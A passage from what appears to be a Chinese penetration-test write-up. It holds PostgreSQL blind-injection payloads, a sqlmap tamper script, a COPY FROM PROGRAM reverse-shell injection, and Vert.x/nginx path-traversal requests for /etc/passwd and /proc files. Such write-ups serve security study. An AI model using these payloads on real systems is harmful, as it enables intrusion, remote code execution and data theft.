\u8bed\u53e5\uff0c\u4f46\u5982\u4f55\u628a\u5b83\u5d4c\u5165\u81f3 payload \u4e2d\uff0c\u8fd8\u9700\u8981\u4e00\u756a\u5c1d\u8bd5\uff1a<\/p>\n<pre class=\"lang:pgsql decode:true \">-- ERROR: operator does not exist: integer[] || xml\r\nselect func('{1}'::int[] || query_to_xml('select 1',true,true,'') || '{2}');\r\n\r\n-- ERROR: cannot cast type xml to integer[]\r\nselect func('{1}'::int[] || query_to_xml('select 1',true,true,'')::int[] || '{2}');\r\n\r\n-- ERROR: operator does not exist: integer[] || xml[]\r\nselect func('{1}'::int[] || ARRAY[query_to_xml('select 1',true,true,'')] || '{2}');\r\n\r\n-- ERROR: operator does not exist: integer[] || boolean[]\r\nselect func('{1}'::int[] || ARRAY[query_to_xml('select 1',true,true,'') ISNULL] || '{2}');\r\n\r\n-- PASS: 1,0,2\r\nselect func('{1}'::int[] || ARRAY[query_to_xml('select 1',true,true,'') ISNULL ::int] || '{2}');<\/pre>\n<p>\u53ef\u4ee5\u53d1\u73b0\uff0cpgSQL \u662f\u4e00\u5b9a\u7684\u5f3a\u7c7b\u578b\u8bed\u8a00\u3002\u5bf9\u7740\u5728<span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"https:\/\/www.postgresql.org\/docs\/7.2\/sql-precedence.html\">\u5b98\u7f51\u6587\u6863<\/a><\/span>\u4e0a\u627e\u5230\u7684\u8fd0\u7b97\u7b26\u8868\u53ca\u4f18\u5148\u7ea7\u6784\u9020\uff0c\u6700\u7ec8\u5f97\u5230\u4e86\u4e00\u4e2a\u53ef\u884c\u7684 payload\u3002\uff08\u540e\u6765\u53d1\u73b0\uff0c\u8fd8\u53ef\u4ee5\u91c7\u7528 <code>LENGTH(query_to_xml('select 1',true,true,'')::text)<\/code> \u8fd9\u6837\u7684\u6784\u9020\u6cd5\uff0c\u5176\u5b9e\u6709\u5f88\u591a\uff09<\/p>\n<p>\u5b57\u7b26\u4e32\u7684\u8bdd\uff0c\u7531\u4e8e\u5355\u5f15\u53f7\u6ca1\u8fc7\u6ee4\u6839\u672c\uff0c\u76f4\u63a5\u62c6\u5206\u5c31\u884c\uff0c\u4fdd\u9669\u4e00\u70b9\u4f7f\u7528 <code>CHR()<\/code> \u51fd\u6570\u5e76\u8d77\u6765\u4e5f\u884c\uff0c\u53c8\u6216\u8005\u76f4\u63a5\u4ece HEX \u8f6c\u6362\u4e5f\u884c <code>convert_from(decode('00000000','hex'),'UTF8')<\/code> \u3002<\/p>\n<p>\u63d0\u4ea4\u5982\u4e0a\u6784\u9020\u597d\u7684 payload\uff0c\u89c2\u5bdf\u5230 <code>pg_sleep()<\/code> \u6210\u529f\u6267\u884c\u4e86\uff01\uff01\u7b80\u5355\u5730\u6413\u4e00\u4e2a tamper \uff0c\u628a SQL \u5168\u90e8\u585e\u5230 query_to_xml \u91cc\u9762\uff0c\u7136\u540e\u76f4\u63a5\u6254\u8fdb sqlmap \u8dd1\uff1a<\/p>\n<pre class=\"lang:python decode:true \">def tamper(payload, **kwargs):\r\n    sql = \"convert_from(decode('*','hex'),'UTF8')\".replace('*', payload.encode().hex())\r\n    prefix = \"1,1}' || ARRAY[(select query_to_xml('select 1 where true'||*,true,true,'')) ISNULL ::int] || '{2,2\"\r\n    return prefix.replace('*', sql)<\/pre>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-1771\" src=\"https:\/\/0.mnihyc.com\/blog\/wp-content\/uploads\/2023\/09\/p1757-sqlmap-succ.png\" alt=\"\" width=\"1595\" height=\"507\" srcset=\"https:\/\/0.mnihyc.com\/blog\/wp-content\/uploads\/2023\/09\/p1757-sqlmap-succ.png 1595w, https:\/\/0.mnihyc.com\/blog\/wp-content\/uploads\/2023\/09\/p1757-sqlmap-succ-300x95.png 300w, https:\/\/0.mnihyc.com\/blog\/wp-content\/uploads\/2023\/09\/p1757-sqlmap-succ-1024x325.png 1024w, https:\/\/0.mnihyc.com\/blog\/wp-content\/uploads\/2023\/09\/p1757-sqlmap-succ-150x48.png 150w, https:\/\/0.mnihyc.com\/blog\/wp-content\/uploads\/2023\/09\/p1757-sqlmap-succ-768x244.png 768w, https:\/\/0.mnihyc.com\/blog\/wp-content\/uploads\/2023\/09\/p1757-sqlmap-succ-1536x488.png 1536w\" sizes=\"auto, (max-width: 1595px) 100vw, 1595px\" \/><\/p>\n<p>\u591a\u5c11\u5fc3\u9178\u591a\u5c11\u6cea\u3002<\/p>\n<p><a id=\"tag_pgsql_3\"><\/a>\u00a0<\/p>\n<ul>\n<li>\n<h5>\u67f3\u6697\u82b1\u660e<\/h5>\n<\/li>\n<\/ul>\n<p>\u83b7\u53d6\u4e00\u4e0b\u57fa\u672c\u4fe1\u606f\uff0cPostgreSQL \u7684\u63d0\u6743\u7531\u4e8e\u5176\u5f3a\u5927\u7684\u529f\u80fd\uff0c\u663e\u5f97\u6bd4\u8f83\u5bb9\u6613\uff1a<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-1774\" src=\"https:\/\/0.mnihyc.com\/blog\/wp-content\/uploads\/2023\/09\/p1757-sqlmap-superuser.png\" alt=\"\" width=\"651\" height=\"198\" srcset=\"https:\/\/0.mnihyc.com\/blog\/wp-content\/uploads\/2023\/09\/p1757-sqlmap-superuser.png 651w, https:\/\/0.mnihyc.com\/blog\/wp-content\/uploads\/2023\/09\/p1757-sqlmap-superuser-300x91.png 300w, https:\/\/0.mnihyc.com\/blog\/wp-content\/uploads\/2023\/09\/p1757-sqlmap-superuser-150x46.png 150w\" sizes=\"auto, (max-width: 651px) 100vw, 651px\" \/><\/p>\n<p>\u8fd9\u4e0b\u53c8BBQ\u514b\uff0c\u6709 superuser \u6743\u9650\uff0c\u53ef\u4ee5\u76f4\u63a5\u901a\u8fc7 <a href=\"https:\/\/book.hacktricks.xyz\/network-services-pentesting\/pentesting-postgresql#rce-to-program\"><span style=\"color: #0000ff;\"><span style=\"color: #0000ff;\">COPY FROM<\/span> \u547d\u4ee4<\/span><\/a>\u6765 RCE\u3002\u7136\u540e\u95ee\u9898\u53c8\u6765\u4e86\uff1a<\/p>\n<pre class=\"lang:pgsql decode:true \">-- ERR: COPY is not allowed in a non-volatile function\r\nselect query_to_xml('copy tb from program ''id''',true,true,'');<\/pre>\n<p>\u662f\u7684\uff0cquery_to_xml \u7cfb\u5217\u51fd\u6570\u662f READ-ONLY \u7684\uff0c\u4e5f\u5c31\u662f\u8bf4\u5728\u8fd9\u91cc\u53ea\u80fd\u6267\u884c SELECT \u8bed\u53e5\uff0cCREATE \/ INSERT \/ UPDATE \u90fd\u662f\u901a\u901a\u4e0d\u884c\u7684\u3002\u800c\u50cf EXECUTE \u8fd9\u79cd\u53ea\u80fd\u5b58\u5728\u4e8e plpgsql \u58f0\u660e\u7684\u51fd\u6570\u91cc\u3002\u4e5f\u5c1d\u8bd5\u8fc7\u5176\u4ed6\u7684 getshell \u65b9\u6848\uff0c\u53ea\u7528 select \u7684\u8bdd\u867d\u7136\u80fd\u505a\u5230\u4efb\u610f\u5217\u76ee\u5f55\u8bfb\u5199\u6587\u4ef6\uff0c\u4f46\u7531\u4e8e\u8fd9\u91cc\u662f\u65f6\u95f4\u76f2\u6ce8\uff0c\u53ef\u80fd\u4f1a\u5bf9\u6570\u636e\u5e93\u53ca\u914d\u7f6e\u6587\u4ef6\u9020\u6210\u6f5c\u5728\u7684\u635f\u5bb3\uff0c\u8fd9\u5728\u751f\u4ea7\u73af\u5883\u4e2d\u662f\u65e0\u8bba\u5982\u4f55\u90fd\u8981\u907f\u514d\u7684\u3002<\/p>\n<p>\u53e6\u8f9f\u8e4a\u5f84\uff0cpg_stat_activity \u4e2d\u5b58\u653e\u7740\u5f53\u524d\u6267\u884c\u7684 SQL \u8bed\u53e5\u3002\u5982\u679c\u80fd\u7206\u51fa\u539f\u6765 SELECT \u8bed\u53e5\u7684\u5177\u4f53\u7ed3\u6784\uff0c\u90a3\u4e0d\u5c31\u53ef\u4ee5\u95ed\u5408\uff0c\u7136\u540e\u76f4\u63a5\u5806\u53e0\u6ce8\u5165\u4e86\u5417\uff1f\u5f53\u7136\uff0c\u8fd9\u4e5f\u5f97\u5efa\u7acb\u5728 WAF \u6ca1\u6709\u8fc7\u6ee4\u76f8\u5e94\u5173\u952e\u5b57\u7684\u60c5\u51b5\u4e0b\u3002\u4e0d\u8fc7\u503c\u5f97\u4e00\u8bd5\uff1a<\/p>\n<pre class=\"lang:pgsql decode:true \">select \r\n    pid,\r\n    usename as username,\r\n    datname as database_name,\r\n    RIGHT(query, 50),\r\n    application_name,\r\n    backend_start,\r\n    state,\r\n    state_change\r\n  from pg_stat_activity\r\n  where\r\n      usename = user\r\n    and\r\n      query like '%query_to_xml%'\r\n  order by pid desc limit 1<\/pre>\n<p>\u8fd9\u91cc\u6709\u4e00\u4e2a\u5751\u70b9\uff1apg_stat_activity \u4e2d\u9ed8\u8ba4\u53ea\u4f1a\u5b58\u653e sql query \u7684\u524d 1024 \u4e2a\u5b57\u8282\uff0c\u4e5f\u5c31\u662f\u8bf4\u5982\u679c\u4e0a\u8fb9\u7528\u4e86 <code>CHR()<\/code> \u52a0\u5bc6 payload\uff0c\u90a3\u5c31\u4f1a\u8bfb\u4e0d\u5b8c\u3002\u3002\u3002\u53e6\u5916\uff0c<code>query_to_xml<\/code> \u91cc\u9762\u518d\u6b21\u6267\u884c\u7684 SQL \u8bed\u53e5\u4e0d\u4f1a\u51fa\u73b0\u5728\u8fd9\u91cc\uff0c\u6240\u4ee5\u53ef\u4ee5\u7b80\u5355\u5730\u7528 <code>query like ''<\/code> \u6765\u5339\u914d\u9700\u8981\u7684\u90a3\u6761\u8bed\u53e5\u3002<\/p>\n<p>sqlmap \u8dd1\u51fa\u6765\u7684\u7ed3\u679c\u662f\uff1a\u00a0<code>F8'),true,true,'')) ISNULL ::int] || '{2,2}','20')<\/code> \u3002\u554a\uff1f\u5c31\u8fd9\u4e48\u7b80\u5355\uff1f\u540e\u9762\u591a\u4e86\u4e2a\u53c2\u6570\u5c31\uff1f\u521a\u624d\u548b\u6ca1\u6d4b\u51fa\u6765\uff1f\uff1f\u7136\u540e\u53d1\u73b0\u521a\u624d\u90fd\u662f\u62ff\u7684\u6570\u5b57 0 \u6216\u8005\u7a7a\u5b57\u7b26\u4e32\u8fdb\u53bb\u6d4b\u7684\uff0c\u8fd9\u91cc\u663e\u7136\u8981\u6c42\u662f\u4e00\u4e2a\u6b63\u6574\u6570\uff0c\u5c5e\u6027\u76f8\u514b\u4e86\u3002\u3002\u3002<\/p>\n<p>\u5230\u8fd9\u91cc\uff0c\u4e00\u5207\u6c34\u843d\u77f3\u51fa\uff0c\u67f3\u6697\u82b1\u660e\uff0c\u9700\u8981\u7684\u53ea\u662f\u628a rev shell \u5f00\u597d\uff0c\u7136\u540e\u63d0\u4ea4\u5982\u4e0b\u7684 payload \u5373\u53ef\uff1a<\/p>\n<pre class=\"lang:js decode:true \">{\"points\":[\"1}',1); CREATE TABLE c_e(c_o text); COPY c_e FROM PROGRAM '{echo,XXXXX}|{base64,-d}|bash'; DROP TABLE c_e; -- -\"]<\/pre>\n<p>\u6709\u610f\u601d\u7684\u662f\uff0c\u8fd9\u91cc\u7684\u8868\u540d\u672c\u6765\u9ed8\u8ba4\u662f <code>cmd_exec<\/code>\uff0c\u7136\u540e\u88ab WAF \u62e6\u4e0b\u4e86\uff0c\u5f53\u65f6\u5c31\u5f88\u7d27\u5f20\u3002\u6d4b\u8bd5\u5230\u540e\u9762\u53d1\u73b0\u68c0\u6d4b\u7684\u7adf\u7136\u662f <code>exec(<\/code> \u8fd9\u4e2a\u7ec4\u5408\u3002\u3002\u3002<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-1778\" src=\"https:\/\/0.mnihyc.com\/blog\/wp-content\/uploads\/2023\/09\/p1757-pgsql-revshell.png\" alt=\"\" width=\"765\" height=\"264\" srcset=\"https:\/\/0.mnihyc.com\/blog\/wp-content\/uploads\/2023\/09\/p1757-pgsql-revshell.png 765w, https:\/\/0.mnihyc.com\/blog\/wp-content\/uploads\/2023\/09\/p1757-pgsql-revshell-300x104.png 300w, https:\/\/0.mnihyc.com\/blog\/wp-content\/uploads\/2023\/09\/p1757-pgsql-revshell-150x52.png 150w\" sizes=\"auto, (max-width: 765px) 100vw, 765px\" \/><\/p>\n<p>\u540e\u8bdd\uff1a\u660e\u6587\u6d41\u91cf\u88ab\u4fe1\u7f51\u529e\uff08SANGFOR STA \u5ba1\u8ba1\u8bbe\u5907\uff09\u76d1\u6d4b\u5230\u4e86\uff0c\u8fd8\u662f\u4e2a\u9ad8\u5371\u98ce\u9669\u3002\u3002\u3002<\/p>\n<p>&nbsp;<\/p>\n<p><a id=\"tag_vertx_1\"><\/a>\u00a0<\/p>\n<hr \/>\n<h4>Vert.x \u5ba1\u8ba1<\/h4>\n<ul>\n<li>\n<h5>\u6709\u9650\u5236\u7684\u4efb\u610f\u4e0b\u8f7d<\/h5>\n<\/li>\n<\/ul>\n<p>\u8bdd\u63a5\u4e0a\u96c6\uff0cPostgreSQL \u7adf\u7136\u662f\u4e00\u4e2a\u5355\u72ec\u7684\u670d\u52a1\u5668\uff0c256G \u5185\u5b58 2T \u786c\u76d8\u5c31\u8dd1\u4e00\u4e2a\u6570\u636e\u5e93\u3002\u3002\u3002\u80fd\u770b\u5230\u4ece\u53e6\u5916\u4e24\u4e2a IP \u8fc7\u6765\u7684\u8fde\u63a5\uff0c\u770b\u6765\u8ddd\u79bb\u5b8c\u5168\u62ff\u4e0b\u4e1a\u52a1\u7cfb\u7edf\uff0c\u8fd8\u6709\u4e00\u6bb5\u8def\u8981\u8d70\u3002<\/p>\n<p>\u6709\u4e86\u6e90\u4ee3\u7801\u4f5c\u4e3a\u53c2\u8003\uff0c\u5176\u4ed6\u7684 API \u81ea\u7136\u662f\u9700\u8981\u91cd\u5ba1\u4e00\u904d\u3002\u6765\u5230\u4e86 <code>\/api\/download<\/code> \u5904\uff0c\u5728 fuzz test \u65f6\u8bd5\u8fc7 <code>..\/<\/code> \u8fdb\u884c Directory Traversal\uff0c\u4f46\u6ca1\u6709\u6210\u529f\uff0c\u8fd4\u56de\u7c7b\u578b\u53ea\u6709\u6587\u4ef6\u5185\u5bb9\u6216\u201cdownload failed\u201d\u3002\u5b9a\u4f4d\u5230\u76f8\u5173\u4ee3\u7801\u5904\uff1a<\/p>\n<pre class=\"lang:java decode:true \">\/\/ io.vertx.ext.web.Router\r\nsubRouter.get(\"\/api\/download\/:filename\").handler(context -&gt; {\r\n    String filename = context.request().getParam(\"filename\");\r\n    context.response().sendFile(\"upload\/images\/\" + filename);\r\n});<\/pre>\n<p>\u53ef\u4ee5\u53d1\u73b0\uff0c\u786e\u5b9e\u662f\u76f4\u63a5\u62fc\u8fdb\u53bb\u7684\u3002\u90a3\u4e3a\u5565\u4ec0\u4e48\u90fd\u8bfb\u4e0d\u51fa\u6765\u5462\uff1f\uff1f\u8fd9\u91cc\u9700\u8981\u63d0\u4e00\u5634 WAF\u3002\u8fd9\u4e2a\u4e1c\u897f\uff0c\u4f1a block \u4ee5\u4e0b\u7684\u8bf7\u6c42\uff1a<code>etc\/<\/code> <code>logs\/<\/code> \uff0c\u867d\u7136\u6ca1\u6709\u76f4\u63a5\u62e6\u622a <code>..\/<\/code> \uff0c\u4f46\u4f1a\u79cb\u540e\u7b97\u8d26\u62c9\u6e05\u5355\uff0c\u53ea\u8981\u8bbf\u95ee\u4e86\uff0c\u4e00\u5206\u949f\u540e\u5fc5\u5c01 IP\u3002\u7136\u540e Windows \u7684\u91cd DHCP lease \u901f\u5ea6\u662f\u53ef\u4ee5\u60f3\u8c61\u7684\u3002\u3002\u3002\u4e5f\u5c31\u662f\u8bf4\uff0c\u8fd9\u4e2a\u5730\u65b9\u6d4b\u8d77\u6765\u65f6\u95f4\u6210\u672c\u7279\u522b\u9ad8\u3002\u90a3\u4e48\u56de\u5230\u8fd9\u4e2a\u4efb\u610f\u4e0b\u8f7d\u70b9\uff0c\u4e3a\u4ec0\u4e48\u8bf4\u5b83\u662f\u6709\u9650\u5236\u7684\u5462\uff0c\u4e00\u662f\u5b58\u5728\u8fd9\u4e48\u4e2a WAF\uff0c\u4e3b\u8981\u662f <code>etc\/<\/code> \u90fd\u8fc7\u6ee4\u4e86\u8fd8\u80fd\u8bfb\u4e2a\u5565\u4e1c\u897f\uff1b\u4e8c\u662f\u5f53 <code>..\/<\/code> \u7684\u6570\u76ee\u8d85\u8fc7\u5f53\u524d URI path \u957f\u5ea6\u65f6\uff0c\u4f1a\u8fd4\u56de\u719f\u6089\u7684 nginx 400 bad request\u3002\u3002\u3002\u662f\u7684\uff0c\u524d\u7aef\u5b58\u5728\u4e00\u4e2a nginx \u53cd\u4ee3\u9650\u5236\u4e86\u80fd\u8df3\u56de\u7684\u7236\u76ee\u5f55\u5c42\u7ea7\uff1b\u4e09\u662f\u6211\u7684\u4e2a\u4eba\u4e60\u60ef\uff0c<code>\/etc\/issue<\/code> \u8bfb\u4e0d\u4e86\u5c31\u8bfb <code>\/proc\/version<\/code>\uff0c\u540e\u6765\u8bc1\u660e\u4e86\u8fd9\u662f\u4e00\u4e2a\u5de8\u5927\u7684\u5931\u7b56\u3002<\/p>\n<p>\u4e00\u5c42\u4e00\u5c42\u89e3\u51b3\u3002\u9996\u5148\u5728\u672c\u5730\u8d77\u4e00\u4e2a Vert.x \u76f8\u540c Router \u4ee3\u7801\uff0c\u7136\u540e\u4e0a nginx \u540c\u7248\u672c 1.18.0 \u7ed5\u8fc7\uff0c\u6700\u540e\u6d4b\u8bd5\u76ee\u6807\u73af\u5883\u3002\u5bf9\u4e8e Vert.x \u7684\u8def\u7531\u53c2\u6570\u5904\u7406\u903b\u8f91\uff0c\u5c31\u4e0d\u5ba1\u4ee3\u7801\u4e86\uff0c\u76f4\u63a5\u6d4b\u51fa\u4e00\u4e9b\u57fa\u672c\u7ed3\u679c\uff1a<\/p>\n<pre class=\"lang:default decode:true \">\/\/ curl --path-as-is localhost\/PATH\r\n\r\n\/\/ SUCCESS\r\nGET \/api\/download\/image-1.png\r\n\r\n\/\/ FAIL: TREAT AS \/api\/\r\nGET \/api\/download\/..\/\r\n\r\n\/\/ FAIL: 404 NOT FOUND\r\nGET \/api\/download\/1\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/issue\r\n\r\n\/\/ SUCCESS\r\nGET \/api\/download\/..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fissue\r\n\r\n\/\/ EMPTY RESPONSE\r\nGET \/api\/download\/..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fversion\r\n\r\n\/\/ FAIL: FILE NOT FOUND\r\nGET \/api\/download\/non_existence%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fissue<\/pre>\n<p>\u53ef\u4ee5\u53d1\u73b0\uff0c<code>\/:filename<\/code> \u5e76\u4e0d\u662f\u901a\u914d\u7b26\u5339\u914d\uff0c\u4f46\u4f1a\u81ea\u52a8\u89e3\u7801 <code>%2F<\/code> \u7136\u540e\u62fc\u5165 <code>filepath<\/code>\uff0c\u5b58\u5728\u76ee\u5f55\u7a7f\u8d8a\u6f0f\u6d1e\u3002\u8fd9\u91cc\u5b58\u5728\u4e24\u4e2a\u5751\uff1a\u4e00\u662f\u5f53\u5c1d\u8bd5\u8bfb <code>\/proc\/version<\/code> \u65f6\uff0c\u4f1a\u53d1\u73b0\u8fd4\u56de\u7684\u6587\u4ef6\u5185\u5bb9\u4e3a\u7a7a\uff0c\u662f\u8bfb\u53d6\u5931\u8d25\u4e86\u5417\uff1f\u8ddf\u8fdb <code>sendFile()<\/code> \u51fd\u6570\u76f8\u5173\u903b\u8f91\uff1a<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-1781\" src=\"https:\/\/0.mnihyc.com\/blog\/wp-content\/uploads\/2023\/09\/p1757-vertx-sendfile.png\" alt=\"\" width=\"926\" height=\"815\" srcset=\"https:\/\/0.mnihyc.com\/blog\/wp-content\/uploads\/2023\/09\/p1757-vertx-sendfile.png 926w, https:\/\/0.mnihyc.com\/blog\/wp-content\/uploads\/2023\/09\/p1757-vertx-sendfile-300x264.png 300w, https:\/\/0.mnihyc.com\/blog\/wp-content\/uploads\/2023\/09\/p1757-vertx-sendfile-150x132.png 150w, https:\/\/0.mnihyc.com\/blog\/wp-content\/uploads\/2023\/09\/p1757-vertx-sendfile-768x676.png 768w\" sizes=\"auto, (max-width: 926px) 100vw, 926px\" \/><\/p>\n<p>\u53ef\u4ee5\u53d1\u73b0\u8fd9\u91cc\u4f7f\u7528 <code>file.length()<\/code> \u4ee5\u53ca <code>offset<\/code> \uff08\u4ece <code>sendFile()<\/code> \u8c03\u7528\u65f6\u4e3a 0\uff09\u63a7\u5236\u53d1\u9001\u7684\u5b57\u8282\u4f4d\u7f6e\u3002\u7136\u540e\u4e00\u4e2a\u5e7f\u4e3a\u4eba\u77e5\u7684\u4e8b\u5b9e\u5c31\u662f\uff0c<code>\/proc\/<\/code> \u91cc\u9762\u7684\u6587\u4ef6\u5927\u5c0f\u90fd\u662f 0 \u5b57\u8282\uff0c\u6240\u4ee5\u5728\u8fd9\u6837\u7684\u903b\u8f91\u4e0b\u662f\u8bfb\u4e0d\u5230\u7684\u3002\u3002\u3002\u8fd9\u6837\u4e5f\u5c31\u6392\u9664\u4e86\u8bfb <code>\/proc\/self\/cmdline<\/code> \u7b49\u7684\u53ef\u80fd\uff0c\u7b80\u76f4\u662f\u4e0d\u4efb\u610f\u7684\u6587\u4ef6\u4e0b\u8f7d\u3002<\/p>\n<p>\u7136\u540e\u7b2c\u4e8c\u4e2a\u5751\u662f\uff0c\u53e6\u4e00\u4e2a\u5e7f\u4e3a\u4eba\u77e5\u7684\u4e8b\u5b9e\uff0c\u5bf9\u4e8e\u8df3\u56de\u7236\u76ee\u5f55\u7684 <code>..\/<\/code> \uff0c\u53ea\u8981\u8def\u5f84\u4e2d\u5b58\u5728\u4e00\u4e2a\u4e0d\u5b58\u5728\u7684\u5b50\u76ee\u5f55\uff0c\u90a3\u4e48 Linux \u4f1a\u7acb\u5373\u8fd4\u56de file not found\u3002\u7ee7\u7eed\u8ddf\u8fdb\u4e0a\u56fe\u4e2d 487 \u884c\u7684 <code>resolveFile()<\/code>\uff0c\u4f1a\u8fdb\u5165 <code>java.io.File.exists()<\/code> \uff0c\u6700\u7ec8\u901a\u8fc7 JVM C Native \u63a5\u53e3\u8c03\u7528 <code>stat()<\/code> \u51fd\u6570\u5224\u65ad\u6587\u4ef6\u662f\u5426\u5b58\u5728\u3002\u6bd4\u5982\u8bf4\uff0c<code>stat \"\/etc\/\"<\/code> \u662f\u5b58\u5728\u7684\uff0c\u800c <code>stat \"\/etc\/non-existence-dir\/..\/\"<\/code> \u662f\u4e0d\u5b58\u5728\u7684\u3002\u8fd9\u8981\u6c42\u6211\u4eec\u7684\u63a7\u5236\u7684\u8def\u5f84\u53c2\u6570\u5fc5\u987b\u4ee5 <code>..\/<\/code> \u5f00\u59cb \uff0c\u4e0d\u80fd\u5305\u542b\u591a\u4f59\u7684\u4e0d\u5b58\u5728\u76ee\u5f55\uff0c\u4e3a\u4e4b\u540e\u7684\u7ed5\u8fc7\u57cb\u4e0b\u4e86\u4f0f\u7b14\u3002<\/p>\n<p>\u63a5\u4e0b\u6765\u642d\u4e00\u4e2a nginx 1.18.0 \u5e76\u914d\u7f6e <code>\/api\/<\/code> \u53cd\u4ee3\u3002\u4f46\u662f\u8fd9\u91cc\u5b58\u5728\u51e0\u79cd\u5199\u6cd5\u4e0a\u7684\u533a\u522b\uff1a<code>location<\/code> \u52a0\u4e0d\u52a0 <code>\/<\/code> \uff1f<code>proxy_pass<\/code> \u52a0\u4e0d\u52a0 <code>\/<\/code> \uff1f\u5199\u6ca1\u5199\u5230 <code>\/api<\/code> \uff1f\u6ca1\u6709\u4e00\u70b9\u529e\u6cd5\uff0c\u53ea\u80fd\u624b\u52a8\u679a\u4e3e\u5404\u79cd\u60c5\u51b5\uff0c\u63a7\u5236\u53d8\u91cf\u6cd5\u786e\u5b9a\u914d\u7f6e\u6587\u4ef6\u7684\u5199\u6cd5\u3002\u57fa\u4e8e\u4ee5\u4e0b\u7684\u4e8b\u5b9e\uff1a<\/p>\n<ol>\n<li style=\"list-style-type: none;\">\n<ol>\n<li>\u76f4\u63a5\u8bbf\u95ee <code>\/api<\/code> \u4e0d\u4f1a\u88ab\u8f6c\u8df3\u81f3 <code>\/api\/<\/code> \uff1b<\/li>\n<li>\u8bbf\u95ee <code>\/api\/download\/..<\/code> \u76f8\u5f53\u4e8e\u8bbf\u95ee <code>\/api<\/code> \uff1b<\/li>\n<li>\u8bbf\u95ee <code>\/api\/download\/..\/..\/<\/code> \u76f8\u5f53\u4e8e\u8bbf\u95ee\u4e3b\u9875\uff0c\u6ce8\u610f\u662f\u524d\u7aef\u7684\u9759\u6001\u4e3b\u9875\u3002<\/li>\n<\/ol>\n<\/li>\n<\/ol>\n<p>\u53ef\u4ee5\u5408\u7406\u5730\u63a8\u6d4b\u51fa\u914d\u7f6e\u6587\u4ef6\u662f\u8fd9\u6837\u7684\uff1a<\/p>\n<pre class=\"lang:default decode:true \">location \/api {\r\n    proxy_pass http:\/\/IP:PORT;\r\n}<\/pre>\n<p>\u4e0d\u5b58\u5728\u4e00\u4e9b\u79bb\u8c31\u7684\u914d\u7f6e\u9519\u8bef\u3002\u73b0\u5728\u8003\u8651\u7ed5\u8fc7 nginx \u7684\u76ee\u5f55\u5c42\u7ea7\u9650\u5236\u3002\u76f8\u4fe1\u6709\u7ecf\u9a8c\u7684\u670b\u53cb\u5e94\u8be5\u80fd\u7acb\u523b\u8054\u60f3\u5230 <span class=\"content-title \">CVE-2021-43798<\/span> \u4e5f\u5c31\u662f Grafana LFI \u7684\u90a3\u4e2a\u6d1e\uff0cPoC \u4e3a <code>\/public\/plugins\/welcome\/#\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd<\/code> \uff0c\u5176\u4e2d nginx \u901a\u8fc7 <code>\/#\/<\/code> \u8fdb\u884c\u7ed5\u8fc7\u3002\u4f46\u662f\u5728\u8fd9\u4e2aXX\u7cfb\u7edf\u4e2d\uff0c\u76f4\u63a5\u4f20\u5165 <code>\/api\/download\/#%2F..%2F..%2F......<\/code> \u867d\u7136\u5f97\u4ee5\u7ed5\u8fc7 nginx \u7684\u5c42\u7ea7\u9650\u5236\uff0c\u4f46\u8fd8\u8bb0\u5f97\u4e0a\u9762\u7684\u5751\u4e8c\uff0cJava \u672a\u7ecf <code>normalize<\/code> \u76f4\u63a5\u628a <code>filepath<\/code> \u4f20\u8fdb <code>stat()<\/code> \u8c03\u7528\u5417\uff1f\u4e5f\u5c31\u662f\u8bf4\uff0c<code>#<\/code> \u8fd9\u4e2a\u76ee\u5f55\u4e0d\u5b58\u5728\uff0c\u5373\u4f7f\u8df3\u518d\u591a\u7684\u7236\u76ee\u5f55\uff0c\u6700\u7ec8\u7684\u6587\u4ef6\u90fd\u662f\u4e0d\u5b58\u5728\u7684\uff0c\u6839\u672c\u8bfb\u4e0d\u5230\u3002\u9677\u5165\u74f6\u9888\u3002<\/p>\n<p>\u5728\u8fd9\u4e2a\u65f6\u5019\u5c1d\u8bd5\u8fc7\u5404\u79cd HTTP Smuggle \u7684\u65b9\u6cd5\uff0c\u5305\u62ec nginx \u2264 1.18.0 \u7684\u90a3\u4e2a\u7ecf\u5178 CVE \uff08\u867d\u7136\u4ece\u672a\u6210\u529f\u590d\u73b0\u8fc7\uff09\uff0c\u4e5f\u5305\u62ec Vert.x \u5e95\u5c42\u4f7f\u7528\u7684 Netty \u4f4e\u7248\u672c\u90a3\u51e0\u4e2a CVE\uff0c\u4f46\u59cb\u7ec8\u65e0\u6cd5\u6210\u529f\u3002\u8fd8\u662f\u5f97\u56de\u5230\u95ee\u9898\u672c\u8eab\u3002\u4ed4\u7ec6\u56de\u60f3\u81f3\u6b64\u7684\u6240\u6709\u7279\u6027\uff0c\u4e0d\u77e5\u662f\u5426\u6709\u7075\u5149\u4e00\u73b0\uff1a\u4f7f\u7528 <code>\/api\/download\/#\/..\/..%2F..%2F......<\/code> \u4e0d\u5c31\u53ef\u4ee5\u5566\uff1fnginx \u8df3\u8fc7 <code>\/#\/<\/code> \u4e4b\u540e\u7684\u8def\u5f84\u68c0\u67e5\uff0c\u800c Vert.x \u68c0\u6d4b\u5230\u672a\u7f16\u7801\u7684 <code>\/#\/..\/<\/code> \u9009\u62e9\u5411\u4e0a\u8df3\u4e00\u7ea7\u56de\u5230 <code>\/api\/download\/<\/code> \u8def\u7531\uff0c\u4e4b\u540e\u7684 <code>..%2F<\/code> \u4e0d\u5c31\u968f\u4fbf\u5199\u5566\uff1f\u8fd9\u662f nginx \u4e0e Vert.x \u7684\u89e3\u6790\u5dee\u5f02\u3002<\/p>\n<p>\u5230\u8fd9\u91cc\u867d\u7136\u5f88\u5174\u594b\uff0c\u4f46\u9274\u4e8e <code>etc logs proc<\/code> \u5168\u90fd\u8bfb\u4e0d\u4e86\uff0c\u4e00\u8fde\u8bd5\u4e86\u597d\u51e0\u4e2a\u5176\u4ed6\u5e38\u89c1\u7684\u6587\u4ef6\uff0c\u5168\u90fd\u4e0d\u5b58\u5728\u3002\u6bd4\u8f83\u96be\u641e\u3002\u53d1\u52a8\u6280\u80fd\uff1a\u5947\u6280\u6deb\u5de7\uff1b\u8bfb\u4e00\u4e2a <code>\/proc\/self\/exe<\/code> 